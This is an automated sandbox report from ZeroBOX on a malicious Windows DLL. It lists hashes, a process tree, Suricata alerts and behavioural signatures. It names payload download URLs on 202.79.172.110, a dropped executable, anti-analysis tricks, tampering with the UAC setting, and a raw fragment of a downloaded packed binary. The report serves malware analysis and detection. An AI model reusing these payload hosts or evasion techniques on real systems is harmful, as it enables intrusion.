Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Nov. 11, 2023, 4:18 p.m.	Nov. 11, 2023, 4:51 p.m.

Size	73.5KB
Type	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5	`89d063bf866a6428c1cd61b9caeb5bec`
SHA256	`ebb8d703ff2db9f7ad0eb5172b55454848391abd765b9c1fc869d05d5d8a592f`
CRC32	`294F4F3F`
ssdeep	`1536:awsdCFnE4Nz1/SXPtpoprAeDYxUfGBhK5O:awsAik1a4pGBhK5O`
Yara	Malicious_Library_Zero - Malicious_Library IsPE32 - (no description) PE_Header_Zero - PE File Signature IsDLL - (no description)

rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\j-3.dll,Edge
792
- tQ2TR.exe "C:\Users\Public\HAfyl8\tQ2TR.exe"
  2192
  - cmd.exe cmd /c echo.>c:\xxxx.ini
    2296
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\j-3.dll,
296

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
202.79.172.110	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 202.79.172.110:8000 -> 192.168.56.103:49163	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 202.79.172.110:8000 -> 192.168.56.103:49163	2023711	ET MALWARE JS/WSF Downloader Dec 08 2016 M7	A Network Trojan was detected
TCP 202.79.172.110:8000 -> 192.168.56.103:49163	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 202.79.172.110:8000 -> 192.168.56.103:49163	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 202.79.172.110:8000 -> 192.168.56.103:49163	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 202.79.172.110:8000 -> 192.168.56.103:49163	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Nov. 11, 2023, 4:18 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 11, 2023, 4:18 p.m.			0	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 11, 2023, 4:18 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://202.79.172.110:8000/1
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://202.79.172.110:8000/2
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://202.79.172.110:8000/3
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://202.79.172.110:8000/4

Performs some HTTP requests (4 events)

request	GET http://202.79.172.110:8000/1
request	GET http://202.79.172.110:8000/2
request	GET http://202.79.172.110:8000/3
request	GET http://202.79.172.110:8000/4

Allocates read-write-execute memory (usually to unpack itself) (11 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x744de000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75931000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76e01000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x752e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76971000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74460000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x744f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76bd1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x756f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74fe1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2192 region_size: 94208 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03530000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

tQ2TR.exe tried to sleep 356 seconds, actually delayed analysis time by 356 seconds

Creates executable files on the filesystem (2 events)

file	C:\Users\Public\HAfyl8\tQ2TR.exe
file	C:\Users\Public\HAfyl8\0Jv52Q.exe

Drops a binary and executes it (1 event)

file	C:\Users\Public\HAfyl8\tQ2TR.exe

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (14 events)

Time & API	Arguments	Status	Return
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000000fc process_name: mobsync.exe process_identifier: 1552	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000000fc process_name: cmd.exe process_identifier: 1460	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000000fc process_name: pw.exe process_identifier: 1072	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: svchost.exe process_identifier: 2484	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: mscorsvw.exe process_identifier: 2512	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: mscorsvw.exe process_identifier: 2552	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: cmd.exe process_identifier: 2680	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: conhost.exe process_identifier: 2688	1	1
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: pw.exe process_identifier: 2712	1	1
Process32NextW Nov. 11, 2023, 4:19 p.m.	snapshot_handle: 0x00000348 process_name: cmd.exe process_identifier: 2756	1	1
Process32NextW Nov. 11, 2023, 4:19 p.m.	snapshot_handle: 0x00000270 process_name: pw.exe process_identifier: 2836	1	1
Process32NextW Nov. 11, 2023, 4:19 p.m.	snapshot_handle: 0x00000344 process_name: cmd.exe process_identifier: 2868	1	1
Process32NextW Nov. 11, 2023, 4:19 p.m.	snapshot_handle: 0x00000344 process_name: conhost.exe process_identifier: 2876	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Nov. 11, 2023, 4:18 p.m.	process_identifier: 2192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 155648 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x10001000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process rundll32.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Nov. 11, 2023, 4:18 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTàà@P 0>` @@Ào$uÄ@$5pUPX0P àUPX1à` à@à.rsrc@@:ä@À3.91UPX! QµÙä½ª&ÞÀ&/ÿÿÿÿÁL$HÿHÇ4hNÂVñè/.öDï¾¿ý$tVASYÆ^6ÇIÃÿqûÿýÿt$PÂ¸lMT ß@ìmÿ·ÿMèÿSVW}9}eðuìsWûÿîßYEMÜÛMeüWÆEü¨ooíu4~üÿØ<BÿvÔÎSoßm1)]F¤ü;ßtý=¸µ6I4Yô_^d Z»öÿ÷Ð[ÉÂEäèHêàìw Ö¥¿7jjmSð_¸Ô4yùlí{Á3ÛLÔ]üTEñÀIáíwy^¡<ðQÐRÌÿ¾T§<í&S:ÐÐÀ^È¿»öûP/EÀzPj ô4ëGÀuiØvÌMCäxÿhdjÿQÏbîap/âøÇt8\|³ûIÊßN¦H9¼FFu-Áó0Çì£mù·Eè3ÛSSßýçé¹ :Rh/@+{ÿþàYÃö,u KFÃ>r¥û U_¹(Lhord@(ù±èr³`Äl<HFUìw<üTFh1¢ðYÞAÑöf¾¦{Å ¶Vfííÿ\Äë3özô3Àü¿0ýÿÏÈÀøÁá3ÒòÙ#÷#ß3óðãß¾æÒ3U^ÑâÑáÿMøuüa7Üâ@=tZ¬\|ÄÚC`ñáØ¯é;xÈ%uçÿ \$ðöYt!ÀFp/stàÛÿàvÀDøjÊ^öÁªÑé3ËØàoúBéNuÂBÇú9\|ÝÁ U6,Î(èQOÍñÑj8ðè>uçÎÓf8 d3;fÖÂÖkÈãÉ#@éÍ^U L¬pü¿ÙA\|ÐHÒt,Q@SWØý»à&\¶pçÿ¤3ûFÁè¯£3¼&<º3Ç®cuö[D^¦Óu«]XÈ¤Pvx-Út¢°PáBäFrÉ÷uí^ÃE°ï×b´W"3ÿLÊÃ9Æ VdÌÎÄðÚ¼ +ëº@¦Àtå7XÉ)ä³k©üMðT!T_ Á]éÃ¸À¸ kÓÁ½ãkú>+u,ÇF,äb\|·¦iZ8<40@D 4MÓHLPTX(íTÚÔ,¡Üâîò;÷8tzàÚµ[¾ ®Ð3\|LÎ´¦óàO`Hjë.-¶9F(^À²ü@mæ2ÃÁî¼89_üì^8tòZx;ûmÜ9_,o®´Û\|.Hu0Lu4÷¿ÖF´TJG4;Ã\|e+àÛt`Xt[P¶@Ïðnhí9W8(&Ppþuÿ?{»ÂT²ÿO4$(} è(\|Åjú Wwöaðsì1s{ÚÅ3Ö,MÌHtH @äÈð:@ÝOåvÕ,,ø\|Ê·Ü,ÿë§ð0^"¸Läu¦\.I00Ô00'Çä4;ÿ.oN³þÿÿªX¡ÈáÉèGeépSEèÑèÔñBhVWÝ·M+38N, 9FðhÂÁÿ9Xøu hÈóPç"Woø5ûSÖ¦ð-#ëqA£æa5EàPÒª}÷ð¢QãÕÿ5Èl½òNr&ìQ;ÿ0À-~^"ái`;çæîG¬}àaëÍN(F«¥'¶pF52À.t% ÙÒs0Ìüðõ¸XÆ6PrÊ>\|:uã_K¡~SÕÉ´ ¶¦\Q®Ã×v&ìäÀà¾pÉ~Si¡Àù';÷#Ä' 0j8Ý_Ñ~¯Èè;Ï}üt â-0Âðäâ8E»RÙ +OIÅ_´T9xøtbè¹Ê3ðNäë»<7åèWWSüh?é.i))ÁApmj #êºýø óªìë>9}Vþ_özÂuÓxN9{Pu~,¿"Ó0o8÷HàèÝF,H%4?GðÌÅ?q× ì$ÀÂtZÿ0\|à öì8pêÒQ¹þhbëaYßGá'Æz`w"üÍ°NÉtÎvpà¼ÂñÎVð3±S[ÅíVQW¢;Ç4VÐZâøJÄ¶md×+Ý_úþªvjèñ¾÷Ð¨t!oÔÂAµÙ.t<¢ `ªðP£½ãÅ¿ßëì;¶pHôSX® ±ClÎK íuç[Ä]ÅNQd@¤mä+Â¿«ö(Xôu/jFL+½üü¸ÀIIDô\|AVÐþÒöèIuòhjßÁûÀ"GãFíÿFG#[\|íð,6>QÿI6dAÎ·$ù4ÃmÎ6Qk0ÕD6ó$iëT lz\ô¯F4 X8ÿE c]`)ãÕÎrÛoÓ¬áL,&ãÆÈ£åDå'Ãg -8L+îÍIËYºBhø3Û .ÀïPüPSV5D`T+ñ_È]øÜ5`ÌÿÖ¯À¸XBÿh]ÛäaD=êzus9]^nPüÝ¡B?Lá;Ã@ôWÑíÚÝ²µFô°«à]`«IrÔ;ótõ¿Á]¸ÏFO8_8ÿwOðCÅëÓß+>´0ë S±8ãSà3ÀTþ7,f´øþt);Ft$ \|Ô¹Þ"(îh`0P[>=âxçþvÊ OøÿN£Îmjÿj-®e6$¤í`-×ñ2M(Vï.H$>ô7®v,êÿ7ÃÁà3íÖÐ (#Ç$C;VrÆñ¤Ô]ùg+8 @·ðX;\ »ÏßÛcøÁ`zÇ@(ÇÛ·Ý<j'Ilù\| èçöÍc%tatO~f<~;[nwéu\$ù Xù~ûìJÿ¾É¶\|3ÓÉ¾Oÿ+*ë&.Ðùú§½ãíëfëâ×Y®ù¿wò:étIuÀ7ÁÝ0ÇäïtM¸irE¯Ãð¸nSUe¤p³jÓU~ k~<ïØÄj Ü\$ ..Ç=öéè²0n]^h\|Ñî »©Sú,zÆFm¶mÕ\ ¶.^,_:`/~,l®LdP×PU±MÑì\^øS+Ë$Ë_¹$`(@_©FÒÆ@ j[¿¥¸^0ªÏ¸7nwäãJMò<è]p ßo×e(Výå©Hæ$RtÕ ëG¬ g¡3îÕh0¦+r_w@¢láH<µA¦À°jëèîNªÝ5û^M°{pÝBü¾U->ý)@îDïS]ÄèltWu=?V6] ÃR:[;¾ýÿtMè#t?jY+Át/tHHdHuÃ°ãgNG`Jf@û¾4]ÇF^ëuË«¼Ï ëi`:ÛkÏí_ëW<tH;/"u åý8EÛt b WyÿÉ&^ë((ÿyL±\F èÀíE}<[¦_ ÿÂA;þ]ÑVVC§uÝh¹r&á©£ request_handle: 0x00cc000c	1	1	0

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (50 out of 461 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x000000fc process_name: pw.exe process_identifier: 1072		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x0000023c process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x0000023c process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000290 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000290 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: tQ2TR.exe process_identifier: 2192		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: mscorsvw.exe process_identifier: 2512		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: mscorsvw.exe process_identifier: 2512		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: mscorsvw.exe process_identifier: 2552		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: mscorsvw.exe process_identifier: 2552		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0
Process32NextW Nov. 11, 2023, 4:18 p.m.	snapshot_handle: 0x00000348 process_name: sppsvc.exe process_identifier: 2604		0	0

Communicates with host for which no DNS query was performed (1 event)

host

202.79.172.110

Attempts to modify UAC prompt behavior (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

202.79.172.110:7700

j-3

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All